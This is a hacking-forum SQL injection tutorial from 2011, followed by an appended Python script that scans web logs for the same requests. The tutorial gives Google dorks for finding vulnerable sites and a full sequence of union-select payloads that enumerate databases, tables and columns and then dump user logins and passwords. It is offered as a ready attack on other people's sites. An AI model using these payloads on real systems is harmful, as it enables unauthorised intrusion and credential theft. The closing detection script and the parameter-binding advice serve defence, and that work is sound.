SQL injection Tutorial

  1. Finding vulnerable sites
  2. Finding amount of columns
  3. Getting MySQL version and current user
  4. Getting Databases
  5. Getting Tables
  6. Getting Columns
  7. Getting Usernames and Passwords



1. Finding vulnerable sites


To find vulnerable sites you are going to use Google dorks.
Some common dorks are:

Code:
inurl:index.php?id=
inurl:news.php?id=
inurl:category.php?id=
inurl:games.php?id=
inurl:forum.php?tid=
inurl:newsletter.php?id=
inurl:content.php?id=

You can read my tutorial on how to use the SQL injection scanner called "SQL Poizon":

http://www.hackforums.net/showthread.php?tid=1124572

Let's say you got this site:
Code:
http://site.com/news/view.php?id=828
If we add a ' before or after the numbers, it should look something like this if it's vulnerable:

[Image: sqlitut1.jpg]

2. Finding amount of columns


To find the right number of columns we use "order by". Here is how it works:

Code:
http://site.com/news/view.php?id=828 order by 1-- (page loads normal)
http://site.com/news/view.php?id=828 order by 2-- (page loads normal)
http://site.com/news/view.php?id=828 order by 3-- (page loads normal)
http://site.com/news/view.php?id=828 order by 4-- (page loads normal)
http://site.com/news/view.php?id=828 order by 5-- (page loads normal)
http://site.com/news/view.php?id=828 order by 6-- (page loads normal)
http://site.com/news/view.php?id=828 order by 7-- (page loads normal)
http://site.com/news/view.php?id=828 order by 8-- (page loads normal)
http://site.com/news/view.php?id=828 order by 9-- (error)

This means our site has 8 columns, and we will now move on to "union select".

This is how it works:
Code:
http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,7,8--

Note the hyphen - before the numbers!

This should make the website show some numbers on the screen, like this:

[Image: sqlitut2.jpg]

This means it is absolutely certain that the site is vulnerable to SQL injection.

3. Getting MySQL version and Current User


Now we want to know the MySQL version. If it's over 5, then it's injectable by this tutorial (if it's under 4, then you have to guess tables and columns).

Code:
http://site.com/news/view.php?id=-828 union select 1,2,@@version,4,5,6,7,8--

[Image: sqlitut3.jpg]

To get the current user you type this:

Code:
http://site.com/news/view.php?id=-828 union select 1,2,user(),4,5,6,7,8--

This should display:

[Image: sqlitut4.jpg]

4. Getting Databases


Now we want to find the databases and the current database.
Here is the syntax for all databases:

Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(schema_name),4,5,6,7,8 from+information_schema.schemata--

It should display something like this:

[Image: sqlitut5.jpg]

Now we would like to know what the current database is. It's pretty obvious in this case, but it is useful sometimes.

Syntax for current database:

Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,database(),4,5,6,7,8

This should display something like this:

[Image: sqlitut6.jpg]

5. Getting Tables


Now we want to know the tables in the database, and for this we will continue using "union select".

Here is the code:
Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema=database()--

This should display something like this:

[Image: sqlitut7.jpg]

We now know that the table that passwords should be stored in is called bpusers. Write it down and move on.

6. Getting Columns


Now we want to know the columns.

Here is the code:
Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_schema=database()--

This should display something like this:

[Image: sqlitut8.jpg]

7. Dumping users/pass


Now you would like to dump logins and passwords from bpusers.

Here is the code for that:
Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(login,0x3a,password,0x3a),4,5,6,7,8 from bpusers--

This would display something like this:

[Image: sqlitut9.jpg]

(NOTE: 0x3a will make a : between logins and passwords.)

You have now performed a SQL injection attack.

I have worked hard on this, please don't leech it.

If you do, give credits to me.


© Copyright Join7 2011

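From the defender's side, the request strings in sections 2 through 7 leave a recognizable trail in web server access logs. The Python sketch below is an added example, not part of the original post; the log lines, client addresses and signature names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Signatures built from the request strings shown in the tutorial above.
SIGNATURES = {
    "order_by_probe": re.compile(r"\border\s+by\s+(\d+)", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(?:schemata|tables|columns)\b", re.I),
    "server_info": re.compile(r"@@version|\b(?:user|database)\s*\(\s*\)", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
}
# Client address and request target from a common/combined-format access log line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')

def scan(lines):
    """Map each client to the sorted signature names seen in its query strings."""
    hits, order_by = defaultdict(set), defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # Decode %20 and '+' so encoded and plain payloads match the same pattern.
        query = unquote_plus(urlsplit(target).query)
        for name, rx in SIGNATURES.items():
            if rx.search(query):
                hits[client].add(name)
        found = SIGNATURES["order_by_probe"].findall(query)
        order_by[client].update(int(n) for n in found)
    for client, indexes in order_by.items():
        # Three or more distinct indexes from one client is the section 2 column walk.
        if len(indexes) >= 3:
            hits[client].add("column_count_enumeration")
    return {client: sorted(names) for client, names in hits.items()}

# Constructed sample log (documentation-range addresses, hypothetical host).
REQ = '{ip} - - [10/Oct/2011:13:55:{s:02d} +0000] "GET /news/view.php?id={q} HTTP/1.1" {st} 5120'
SAMPLE_LOG = [
    REQ.format(ip="198.51.100.20", s=1, q="828", st=200),
    REQ.format(ip="203.0.113.7", s=10, q="828%20order%20by%201--", st=200),
    REQ.format(ip="203.0.113.7", s=12, q="828%20order%20by%202--", st=200),
    REQ.format(ip="203.0.113.7", s=14, q="828%20order%20by%209--", st=500),
    REQ.format(ip="203.0.113.7", s=30, q="-828+UNION+SELECT+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables+where+table_schema=database()--", st=200),
    REQ.format(ip="198.51.100.20", s=40, q="829&sort=order", st=200),
]

if __name__ == "__main__":
    for client, names in scan(SAMPLE_LOG).items():
        print(client, ", ".join(names))
```

Log matching only shows that someone probed the parameter. The fix for the flaw itself is to bind `id` as a query parameter (or cast it to an integer) so it never reaches the database as SQL text.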